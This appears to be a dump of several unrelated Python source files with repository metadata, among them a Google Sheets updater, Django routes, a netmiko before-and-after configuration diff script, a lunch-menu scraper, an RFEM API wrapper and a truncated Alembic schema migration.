    Width is the LaTeX \\textwidth (405.45183 pt) converted to inches and
    multiplied by *scale*; height is width times a golden-ratio-derived
    aspect, scaled by *rows* (the number of subplot rows) and a 0.51 factor.
    """
    textwidth_pt = 405.45183          # from LaTeX: \\the\\textwidth
    inches_per_pt = 1.0 / 72.27       # pt -> inch conversion
    aspect = rows * 0.51 * (np.sqrt(5.0) - 1.0) / 2.0
    width = textwidth_pt * inches_per_pt * scale
    return [width, width * aspect]
if __name__ == '__main__':
    # Build the thesis figures. Earlier revisions listed many alternative
    # figure configurations here (commented out); only the active one is kept.
    TP = ThesisPlot()
    TP.addPlot(os.path.join("Chap2", "Transient", "eit_propagation.json"),
               "2_3_eit_propagation.pgf", "Chap2_Fig2.3",
               size=1, tl=True, yoffset=[-0.13, None], w_pad=1.6, bottom=0.22)
    TP.generatePlots()
e5a7b8b0481012f5ade5147dd6e2ed6513934354 | 1,695 | py | Python | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | update_damage_sheet.py | faith-grins/RS-RS-DamageRankings | 667387bb8971ea57d8ff669efb62ea7c2ef61f8e | [
"Apache-2.0"
] | null | null | null | import gspread
# If modifying these scopes, delete the file token.json.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
# Paths to the OAuth client secret and the cached user token.
CLIENT_SECRET_FILE = '.secrets/PythonSheetsApiSecret.json'
CREDENTIALS_TOKEN = '.secrets/token.json'
# The ID and range of a sample spreadsheet.
SPREADSHEET_ID = '1oc5TC_nGzLXk4sP3zhlyFeYt526cxXXVeDtvMDFWbno'
VALUE_RENDER_OPTION = 'FORMULA'  # Sheets API: return cell formulas, not computed values
VALUE_INPUT_OPTION = 'RAW'       # Sheets API: store written values without parsing
# Layout of the StyleStats worksheet.
stats_starting_row = 4            # first data row of the style table
stylte_stats_sheet = 'StyleStats'  # NOTE(review): name has a typo ("stylte"); kept as-is, referenced below
style_stats_range = 'B4:T'
# A1 ranges of the per-stat "final" columns.
style_final_str_column = 'StyleStats!M4:M'
style_final_end_column = 'StyleStats!N4:N'
style_final_dex_column = 'StyleStats!O4:O'
style_final_agi_column = 'StyleStats!P4:P'
style_final_int_column = 'StyleStats!Q4:Q'
style_final_wil_column = 'StyleStats!R4:R'
style_final_lov_column = 'StyleStats!S4:S'
style_final_cha_column = 'StyleStats!T4:T'
class Character:
    """A character and the sheet rows holding its entries.

    Fix: ``rows`` was a mutable class attribute, so every Character shared
    one list; both attributes are now created per instance. (The class is
    not yet referenced elsewhere in this file.)
    """

    def __init__(self):
        self.rows = []   # sheet row indices belonging to this character
        self.name = ''   # character display name
def login():
    """Run the gspread OAuth flow and return an authorized client.

    Reads the client secret from CLIENT_SECRET_FILE and caches the user
    token at CREDENTIALS_TOKEN.
    """
    return gspread.oauth(credentials_filename=CLIENT_SECRET_FILE, authorized_user_filename=CREDENTIALS_TOKEN)
def get_styles(auth):
    """Group style rows by character name.

    Fetches the style-stats range and returns a dict mapping the first
    column's value to the list of absolute sheet row numbers (row index in
    the fetched range plus ``stats_starting_row``) where it appears.
    """
    workbook = auth.open_by_key(SPREADSHEET_ID)
    rows = workbook.worksheet(stylte_stats_sheet).get(
        style_stats_range, value_render_option=VALUE_RENDER_OPTION)
    characters = {}
    for offset, row in enumerate(rows):
        characters.setdefault(row[0], []).append(offset + stats_starting_row)
    return characters
def update_sheet(auth, characters):
    """Write a placeholder value into cell A1 of the style-stats worksheet.

    Note: ``characters`` is currently unused.
    """
    workbook = auth.open_by_key(SPREADSHEET_ID)
    worksheet = workbook.worksheet(stylte_stats_sheet)
    worksheet.update('A1', 'Testing')
if __name__ == '__main__':
    # Authorize and run the placeholder sheet update. NOTE(review): passes ''
    # for `characters`, which update_sheet currently ignores.
    update_sheet(login(), '')
| 30.818182 | 118 | 0.756342 | 231 | 1,695 | 5.186147 | 0.445887 | 0.066778 | 0.042571 | 0.03005 | 0.118531 | 0.118531 | 0.0601 | 0.0601 | 0 | 0 | 0 | 0.014384 | 0.138643 | 1,695 | 54 | 119 | 31.388889 | 0.806164 | 0.056637 | 0 | 0.051282 | 0 | 0 | 0.18985 | 0.049499 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.025641 | 0.025641 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5a938e5e2ec369977b37c0a78e456d48e469534 | 350 | py | Python | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | Intermediate/json-data.py | abhishek8075374519/python-for-beginners | a3c0334751001c6468819af7c8ae7ec0993a48c3 | [
"MIT"
] | null | null | null | import json as j
# Serialize a Python dict to a JSON string.
data = {"Name": "John Doe", "Age": "22"}
y = j.dumps(data)
print(y)

# A Python list serializes to the equivalent JSON array.
data = [1, 2, 3, 4, 5]
i = j.dumps(data)
print(i)

# Parse a JSON string back into a Python dict and index into it.
x = '{ "name":"John", "age":30, "city":"New York"}'
y = j.loads(x)
print(y)
print(y["age"])
| 16.666667 | 52 | 0.554286 | 59 | 350 | 3.288136 | 0.610169 | 0.092784 | 0.103093 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034351 | 0.251429 | 350 | 20 | 53 | 17.5 | 0.706107 | 0.237143 | 0 | 0.142857 | 0 | 0 | 0.26749 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5aa8f799f1cb16c92d8d94d9ce091e420f85e52 | 958 | py | Python | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | 1 | 2021-06-14T01:08:55.000Z | 2021-06-14T01:08:55.000Z | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | 10 | 2019-01-28T16:03:12.000Z | 2019-01-28T16:09:48.000Z | programdom/problems/urls.py | vCra/Programdom | 23d734409102917734e67d233768b494904a5cef | [
"MIT"
] | null | null | null | from django.urls import path
from programdom.problems.views import ProblemStudentView, ProblemListView, ProblemDetailView, ProblemDeleteView, \
ProblemCreateView, ProblemTestcaseCreateView, ProblemTestCaseUpdateView, ProblemTestCaseDeleteView
# Routes for the problems app.
urlpatterns = [
    # Problem CRUD.
    path("", ProblemListView.as_view(), name="problem_list"),
    path("new/", ProblemCreateView.as_view(), name="problem_create"),
    path("<int:pk>/", ProblemDetailView.as_view(), name="problem_detail"),
    path("<int:pk>/delete/", ProblemDeleteView.as_view(), name="problem_delete"),
    # Student-facing view of a problem.
    path("<int:pk>/student/", ProblemStudentView.as_view(), name="problem_student"),
    # Test cases nested under a problem (keyed by tc_pk).
    path("<int:pk>/tests/new/", ProblemTestcaseCreateView.as_view(), name="problem_test_new"),
    path("<int:pk>/tests/<int:tc_pk>/", ProblemTestCaseUpdateView.as_view(), name="problem_test_update"),
    path("<int:pk>/tests/<int:tc_pk>/delete/", ProblemTestCaseDeleteView.as_view(), name="problem_test_delete"),
]
| 50.421053 | 114 | 0.746347 | 104 | 958 | 6.673077 | 0.317308 | 0.069164 | 0.115274 | 0.195965 | 0.151297 | 0.060519 | 0.060519 | 0 | 0 | 0 | 0 | 0 | 0.088727 | 958 | 18 | 115 | 53.222222 | 0.79496 | 0 | 0 | 0 | 0 | 0 | 0.259916 | 0.063674 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ab3b077876292916d291b072dc3571dc23411f | 3,023 | py | Python | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | Diff-TVT.py | vipersnews/py-tvt-nbn | 02164752db44967c33001f0c738f69feb1a2b283 | [
"Unlicense"
] | null | null | null | from getpass import getpass
import netmiko
import re
import difflib
def make_connection (ip, username, password):
    """Open an SSH session to a Cisco IOS device via netmiko and return the handler."""
    return netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password)
def get_ip(input):
    """Return every IPv4 dotted-quad substring found in *input*, in order."""
    octet = r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
    return re.findall(r'(?:' + octet + r'\.){3}' + octet, input)
def get_ips(file_name):
    """Append every IPv4 address found in *file_name* to the global ``ips`` list.

    Fix: the file was previously opened without ever being closed; a context
    manager now guarantees cleanup. Iterating the handle directly also avoids
    materializing the whole file with readlines().
    """
    with open(file_name, 'r') as handle:
        for line in handle:
            ips.extend(get_ip(line))
def to_doc_a(file_name, varable):
    """Append *varable* followed by a newline to *file_name*.

    Fix: uses a context manager so the handle is closed even if a write fails.
    """
    with open(file_name, 'a') as handle:
        handle.write(varable)
        handle.write('\n')
def to_doc_w(file_name, varable):
    """Overwrite *file_name* with *varable* (no trailing newline is added).

    Fix: uses a context manager so the handle is closed even if the write fails.
    """
    with open(file_name, 'w') as handle:
        handle.write(varable)
# Devices to SSH to, loaded from input/IPs.txt by get_ips().
ips = []
get_ips("input/IPs.txt")

# Show the host list and give the operator a chance to abort.
print('#' * 50)
print('#' * 50, '\n HOSTS', ips, '\n', " Make sure you have checked your individual command files", '\n')
print("IF INCORRECT QUIT NOW CTRL^C ", '\n', '#' * 50)
print('#' * 50)

# Prompt the operator for SSH credentials.
username = input("Username: ")
password = getpass()

# "Before.txt" marks the pre-TVT capture, "After.txt" the post-TVT capture;
# the suffix also drives the diff step at the bottom.
file_name_input = input("For Pre-TVT type Before.txt - For Post-TVT type After.txt : ")

for ip in ips:
    # Per-host output file, e.g. output/10.0.0.1-Before.txt (truncated first).
    file_name = ''.join(("output/" + ip, "-" + file_name_input))
    to_doc_w(file_name, "")
    # Commands for this host come from input/<ip>.txt, one per line.
    commands_list = []
    with open("input/" + ip + '.txt', 'r') as f:
        for line in f:
            commands_list.append(line)
    try:
        net_connect = make_connection(ip, username, password)
        print("Completing " + ip)
        for commands in commands_list:
            output = net_connect.send_command_timing(commands)
            # Append each command's output to this host's results file.
            to_doc_a(file_name, output + '\n')
    # Fix: was a bare `except:` (also swallowed KeyboardInterrupt); still
    # best-effort per host, but only for real errors now.
    except Exception:
        print(ip + " Failed to connect")

# Pre-TVT run: nothing to compare yet.
if "Before" in file_name:
    print('Completed')
# Post-TVT run: diff each host's Before/After captures into an HTML report.
elif "After" in file_name:
    for ip in ips:
        fromfile = ''.join(("output/" + ip, "-" + "Before.txt"))
        tofile = ''.join(("output/" + ip, "-" + "After.txt"))
        # Fix: mode 'U' was removed in Python 3.11; 'r' already gives
        # universal-newline behavior on Python 3.
        fromlines = open(fromfile, 'r').readlines()
        tolines = open(tofile, 'r').readlines()
        diff = difflib.HtmlDiff().make_file(fromlines, tolines, fromfile, tofile)
        # Fix: `f.close` was missing its parentheses, so the report file was
        # never closed; a context manager makes that impossible.
        with open("output/" + ip + "-changes.html", "w") as f:
            f.write(diff)
        print("Open output/" + ip + "-changes.html to see difference")
# Anything other than Before.txt / After.txt was entered.
else:
    print('Before or After not detected')
| 32.159574 | 120 | 0.68872 | 505 | 3,023 | 4.019802 | 0.29901 | 0.078818 | 0.016256 | 0.023645 | 0.116256 | 0.042365 | 0.042365 | 0.014778 | 0.014778 | 0.014778 | 0 | 0.015482 | 0.166722 | 3,023 | 93 | 121 | 32.505376 | 0.790393 | 0.253721 | 0 | 0.123077 | 0 | 0.015385 | 0.218109 | 0.039697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.076923 | 0.061538 | 0.030769 | 0.153846 | 0.138462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ac1349e31fac2f5f5e8ce25f69ca68f7e752f0 | 28 | py | Python | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
] | null | null | null | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
] | null | null | null | pyiArduinoI2Cmotor/__init__.py | tremaru/pyiArduinoI2Cmotor | 5e83c4ab1beaf6041663f4399028a5d3f5fa3f56 | [
"MIT"
] | null | null | null | name = "pyiArduinoI2Cmotor"
| 14 | 27 | 0.785714 | 2 | 28 | 11 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.107143 | 28 | 1 | 28 | 28 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
e5ac46d95f62c31e2cdcf0a830026f35e4bd572a | 620 | py | Python | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 30 | 2015-02-18T14:07:00.000Z | 2021-12-11T15:19:01.000Z | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 16 | 2015-01-01T23:17:24.000Z | 2015-04-18T23:49:27.000Z | code/python/echomesh/output/Registry.py | rec/echomesh | be668971a687b141660fd2e5635d2fd598992a01 | [
"MIT"
] | 31 | 2015-03-11T20:04:07.000Z | 2020-11-02T13:56:59.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.util.registry.Module import register
from echomesh.output.OutputCache import OutputCache
# Registry built from this module's name plus the listed output type names.
REGISTRY = register(
    __name__,
    'Bidirectional',
    'Offset',
    'Output',
    'Map',
    'Spi',
    'Test',
    'Visualizer',
)

# Shared cache of outputs, consulted for non-dict data in make_output().
OUTPUT_CACHE = OutputCache()
def make_output(data):
    """Build an output: dict descriptions go through the registry,
    anything else is resolved through the output cache."""
    if not isinstance(data, dict):
        return OUTPUT_CACHE.get_output(data)
    return REGISTRY.make_from_description(data, default_type='output')
def pause_outputs():
    """Pause all outputs by delegating to echomesh.output.Output
    (imported at call time rather than module load)."""
    from echomesh.output.Output import pause_outputs as _pause
    _pause()
| 22.142857 | 82 | 0.73871 | 72 | 620 | 6.069444 | 0.527778 | 0.08238 | 0.08238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162903 | 620 | 27 | 83 | 22.962963 | 0.842004 | 0 | 0 | 0 | 0 | 0 | 0.082258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5ad2e5b2f0edde8b2e2a850a9a192abd378fd9f | 1,221 | py | Python | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | pihkaparser.py | K4ldun/slack-starterbot | e0c1468df3b343715cf88f66b5cdb959daa25c0e | [
"MIT"
] | null | null | null | from selenium import webdriver #Browser control with options/waits/exceptions.
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import json
def main():
    """Scrape the lunch menu from lintulahti.pihka.fi.

    Renders the page with headless Chrome (Selenium), parses the HTML with
    BeautifulSoup, and returns a dict mapping each day heading to a list of
    food strings. (Python 2 code: relies on the `unicode` builtin.)
    """
    opts = Options()
    opts.add_argument('--headless')
    opts.add_argument('--disable-gpu')
    opts.add_argument('window-size=1000,1000')
    driver = webdriver.Chrome(options=opts)
    #print "Getting info for username " + username
    driver.get("http://lintulahti.pihka.fi/")
    html_source = driver.page_source.encode("utf-8")
    soup = BeautifulSoup(html_source, 'html.parser')
    menu = dict()
    # Each day of the menu lives in a div with class "menu-day".
    day_elems = soup.findAll('div', { "class": ["menu-day"] })
    for elem in day_elems:
        # The day name is in the h3's span; foods are the li spans below it.
        day = elem.find('h3')
        day = unicode(day.span.string).strip()
        foods = elem.findAll('li')
        foodarray = []
        for food in foods:
            foodarray.append( unicode(food.span.string).strip() )
        #print "" # Empty line
        menu[day] = foodarray
    driver.close()
    return menu
def asString():
    """Render the scraped menu as text.

    For each day: the day name on its own line, each food on its own line,
    then a blank separator line. Iteration order follows the menu dict.

    Fix: replaces repeated ``+=`` string concatenation (quadratic) with a
    single ``join`` over collected parts; output is byte-identical.
    """
    menu = main()
    parts = []
    for key in menu:
        parts.append(key + "\n")
        for food in menu[key]:
            parts.append(food + "\n")
        parts.append("\n")
    return "".join(parts)
if __name__ == '__main__':
    # Scrape the menu and dump it to stdout (Python 2 print statement).
    print asString()
| 23.480769 | 79 | 0.692056 | 163 | 1,221 | 5.08589 | 0.466258 | 0.043426 | 0.054282 | 0.033776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010763 | 0.162981 | 1,221 | 51 | 80 | 23.941176 | 0.800391 | 0.091728 | 0 | 0.052632 | 0 | 0 | 0.109502 | 0.019005 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.131579 | null | null | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ae60de2c631682842c6e19a0b866b268ecc7f0 | 203 | py | Python | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | learning_python/ex19.py | wcsten/Python-exercises- | cd025b37fa37d847d8ce4f3aff4be6f7b0b5d487 | [
"MIT"
] | null | null | null | # Ler dois valores (considere que não serão lidos valores iguais) e escrever o maior deles.
# Read two numbers (assumed distinct) and print the larger one.
n1 = float(input('Numero 1:'))
n2 = float(input('Numero 2: '))
print(n1 if n1 > n2 else n2)
| 20.3 | 91 | 0.660099 | 33 | 203 | 4.060606 | 0.727273 | 0.149254 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049689 | 0.206897 | 203 | 9 | 92 | 22.555556 | 0.782609 | 0.438424 | 0 | 0 | 0 | 0 | 0.169643 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5ae9ba55496f9a8c174dd1ac0caa3926485c92a | 2,277 | py | Python | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 16 | 2021-10-13T21:00:11.000Z | 2022-03-21T11:12:09.000Z | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 49 | 2021-10-19T13:18:51.000Z | 2022-03-30T08:20:17.000Z | RFEM/TypesForMembers/memberResultIntermediatePoints.py | Dlubal-Software/RFEM_Python_Client | 9e29c598dadf380d49677c463931f0be659ccc40 | [
"MIT"
] | 7 | 2021-10-13T06:06:24.000Z | 2022-03-29T17:48:39.000Z | from RFEM.initModel import ConvertToDlString, Model, clearAtributes
class MemberResultIntermediatePoint():
    def __init__(self,
                 no: int = 1,
                 members: str = "",
                 point_count: int = 2,
                 uniform_distribution: bool = True,
                 distances=None,
                 comment: str = '',
                 params: dict = None,
                 model=Model):
        """
        Args:
            no (int): Member Result Intermediate Point Tag
            members (str): Assigned Members
            point_count (int): Assigned Point Number (used only when
                uniform_distribution is True)
            uniform_distribution (bool): Uniform Distribution Option
            distances (list): Distances table, a list of rows whose first
                element is the distance value (used only when
                uniform_distribution is False)
            comment (str, optional): Comment
            params (dict, optional): Extra attributes copied onto the
                client object
            model: RFEM model to operate on (defaults to the shared Model)

        Fix: the distances branch previously used the class-level ``Model``
        instead of the ``model`` argument, so a caller-supplied model was
        partially ignored; all client access now goes through ``model``.
        """
        # Client model | Member Result Intermediate Point
        clientObject = model.clientModel.factory.create('ns0:member_result_intermediate_point')

        # Clears object attributes | Sets all attributes to None
        clearAtributes(clientObject)

        # Member Result Intermediate Point No.
        clientObject.no = no

        # Assigned Members
        clientObject.members = ConvertToDlString(members)

        # Point distribution: either an even point count or an explicit
        # distances table.
        clientObject.uniform_distribution = uniform_distribution
        if uniform_distribution:
            clientObject.point_count = point_count
        else:
            clientObject.distances = model.clientModel.factory.create(
                'ns0:member_result_intermediate_point.distances')
            for index, row in enumerate(distances):
                mlvlp = model.clientModel.factory.create(
                    'ns0:member_result_intermediate_point_distances')
                mlvlp.no = index + 1       # 1-based row numbering
                mlvlp.value = row[0]
                mlvlp.note = None
                clientObject.distances.member_result_intermediate_point_distances.append(mlvlp)

        # Comment
        clientObject.comment = comment

        # Adding optional parameters via dictionary
        if params:
            for key in params:
                clientObject[key] = params[key]

        # Add Member Result Intermediate Point to client model
        model.clientModel.service.set_member_result_intermediate_point(clientObject)
| 36.725806 | 119 | 0.615283 | 212 | 2,277 | 6.462264 | 0.34434 | 0.078832 | 0.157664 | 0.190511 | 0.234307 | 0.146715 | 0.146715 | 0.146715 | 0.146715 | 0.10219 | 0 | 0.004505 | 0.317523 | 2,277 | 61 | 120 | 37.327869 | 0.877091 | 0.256478 | 0 | 0 | 0 | 0 | 0.079701 | 0.079701 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.032258 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5aecff027dc26da16498680b52ebce4340235d7 | 12,433 | py | Python | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | 1 | 2020-11-30T17:41:36.000Z | 2020-11-30T17:41:36.000Z | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | 34 | 2020-04-18T19:31:27.000Z | 2021-03-19T13:56:56.000Z | migrations/versions/bdeeeacbec4d_initial_schema.py | Innopoints/backend | 723565ba3f63914a7dab03346696d89e28060d64 | [
"MIT"
] | null | null | null | """Initial schema
Revision ID: bdeeeacbec4d
Revises:
Create Date: 2020-04-11 11:20:18.814141
"""
import json
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'bdeeeacbec4d'   # this migration's Alembic id
down_revision = None        # initial migration: no parent revision
branch_labels = None
depends_on = None

# Default notification channel per category for new accounts; serialized with
# json.dumps as the server default of accounts.notification_settings (JSONB).
DEFAULT_NOTIFICATIONS = {
    'innostore': 'off',
    'volunteering': 'off',
    'project_creation': 'off',
    'administration': 'off',
    'service': 'email',
}
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('accounts',
sa.Column('full_name', sa.String(length=256), nullable=False),
sa.Column('group', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=128), nullable=False),
sa.Column('telegram_username', sa.String(length=32), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=False),
sa.Column('notification_settings', postgresql.JSONB(astext_type=sa.Text()), nullable=False, server_default=json.dumps(DEFAULT_NOTIFICATIONS)),
sa.PrimaryKeyConstraint('email')
)
op.create_table('colors',
sa.Column('value', sa.String(length=6), nullable=False),
sa.PrimaryKeyConstraint('value')
)
op.create_table('competences',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('products',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.Column('type', sa.String(length=128), nullable=True),
sa.Column('description', sa.String(length=1024), nullable=False),
sa.Column('price', sa.Integer(), nullable=False),
sa.Column('addition_time', sa.DateTime(timezone=True), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name', 'type', name='unique product')
)
op.create_table('sizes',
sa.Column('value', sa.String(length=3), nullable=False),
sa.PrimaryKeyConstraint('value')
)
op.create_table('notifications',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('recipient_email', sa.String(length=128), nullable=False),
sa.Column('is_read', sa.Boolean(), nullable=False),
sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True),
sa.Column('timestamp', sa.DateTime(timezone=True), nullable=False),
sa.Column('type', sa.Enum('purchase_status_changed', 'new_arrivals', 'claim_innopoints', 'application_status_changed', 'service', 'manual_transaction', 'project_review_status_changed', 'all_feedback_in', 'added_as_moderator', 'out_of_stock', 'new_purchase', 'project_review_requested', name='notificationtype'), nullable=False),
sa.ForeignKeyConstraint(['recipient_email'], ['accounts.email'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('static_files',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('mimetype', sa.String(length=255), nullable=False),
sa.Column('owner_email', sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(['owner_email'], ['accounts.email'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('varieties',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('size', sa.String(length=3), nullable=True),
sa.Column('color', sa.String(length=6), nullable=True),
sa.ForeignKeyConstraint(['color'], ['colors.value'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['size'], ['sizes.value'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_images',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('variety_id', sa.Integer(), nullable=False),
sa.Column('image_id', sa.Integer(), nullable=False),
sa.Column('order', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('variety_id', 'order', deferrable='True', initially='DEFERRED', name='unique order indices')
)
op.create_table('projects',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=128), nullable=False),
sa.Column('image_id', sa.Integer(), nullable=True),
sa.Column('creation_time', sa.DateTime(timezone=True), nullable=False),
sa.Column('organizer', sa.String(length=128), nullable=True),
sa.Column('creator_email', sa.String(length=128), nullable=False),
sa.Column('admin_feedback', sa.String(length=1024), nullable=True),
